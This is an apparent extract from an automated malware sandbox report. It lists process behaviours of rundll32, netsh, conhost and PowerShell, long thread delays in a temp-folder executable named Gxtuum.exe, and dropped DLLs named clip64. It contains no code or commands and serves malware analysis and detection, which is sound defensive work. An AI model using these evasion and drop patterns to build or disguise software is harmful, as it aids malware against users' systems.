                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeWindow / User API: threadDelayed 9621Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6403Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3391Jump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 7907
                        Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 2089
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3410
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6390
                        Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 2121
                        Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 7875
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dllJump to dropped file
